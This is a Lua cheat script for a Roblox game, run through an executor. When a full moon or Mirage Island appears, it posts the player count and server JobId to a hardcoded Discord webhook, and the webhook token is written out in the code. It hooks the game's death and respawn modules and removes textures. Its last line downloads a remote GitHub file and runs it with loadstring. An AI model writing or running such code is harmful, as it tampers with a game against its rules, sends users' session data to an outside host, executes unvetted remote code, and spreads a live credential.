if game.PlaceId == 7449423635 then
    local moonPhases = {
        ["http://www.roblox.com/asset/?id=9709149409"] = 1,
        ["http://www.roblox.com/asset/?id=9709149485"] = 2,
        ["http://www.roblox.com/asset/?id=9709149570"] = 3,
        ["http://www.roblox.com/asset/?id=9709149637"] = 4,
        ["http://www.roblox.com/asset/?id=9709149706"] = 5,
        ["http://www.roblox.com/asset/?id=9709149777"] = 6,
        ["http://www.roblox.com/asset/?id=9709149855"] = 7,
        ["http://www.roblox.com/asset/?id=9709149431"] = 8
    }
    local Lighting = game:GetService("Lighting")
    local Players = game:GetService("Players")
    local HttpService = game:GetService("HttpService")
    local currentPhase = moonPhases[Lighting.Sky.MoonTextureId] or 1
    local minutesLeft = math.floor((8 - currentPhase) * 7.5)
    if minutesLeft < 10 then
        local Data = {
            embeds = {{
                title = "Full Moon Notify",
                color = FF0022,
                fields = {
                    {name = "Players Count", value = "```" .. #Players:GetPlayers() .. "```", inline = true},
                    {name = "Job Id", value = "```" .. game.JobId .. "```", inline = true},
                }
            }}
        }
        (http_request or request or HttpPost or syn.request)({
            Url = "https://discord.com/api/webhooks/1369562971893661716/i-qRbRYazMMspY84oRx2sGgOwu9Kte7W5yif5Ypa3G82WFTpxdpLEd2Pt2od-I4CVcKF",
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = HttpService:JSONEncode(Data)
        })
    end
    
    local Locations = game.Workspace:WaitForChild("_WorldOrigin"):WaitForChild("Locations")
    if Locations:FindFirstChild("Mirage Island") then
        local MirageData = {
            embeds = {{
                title = "Mirage Notify",
                color = 0x00FF00,
                fields = {
                    {name = "Players Count", value = "```" .. #Players:GetPlayers() .. "```", inline = true},
                    {name = "Job Id", value = "```" .. game.JobId .. "```", inline = true},
                }
            }}
        }
        (http_request or request or HttpPost or syn.request)({
            Url = "https://discord.com/api/webhooks/1369562971893661716/i-qRbRYazMMspY84oRx2sGgOwu9Kte7W5yif5Ypa3G82WFTpxdpLEd2Pt2od-I4CVcKF",
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = HttpService:JSONEncode(MirageData)
        })
    end
end

hookfunction(require(game:GetService("ReplicatedStorage").Effect.Container.Death),function() end);hookfunction(require(game:GetService("ReplicatedStorage").Effect.Container.Respawn),function() end);hookfunction(require(game:GetService("ReplicatedStorage"):WaitForChild("GuideModule")).ChangeDisplayedNPC,function() end);spawn(function() for v0,v1 in pairs(game:GetDescendants()) do if v1:IsA("Texture") then v1.Texture="";elseif (v1:IsA("BasePart") and (v1.Material==Enum.Material.Water)) then v1.Material=Enum.Material.SmoothPlastic;end end for v2,v3 in pairs(game.Players.LocalPlayer.PlayerScripts:GetDescendants()) do local v4={"WaterBlur","WaterEffect","WaterColorCorrection","WaterCFrame","MirageFog"};if table.find(v4,v3.Name) then v3:Destroy();end end end);loadstring(game:HttpGet("https://raw.githubusercontent.com/LuaCrack/Setting/refs/heads/main/Fast.module"))();
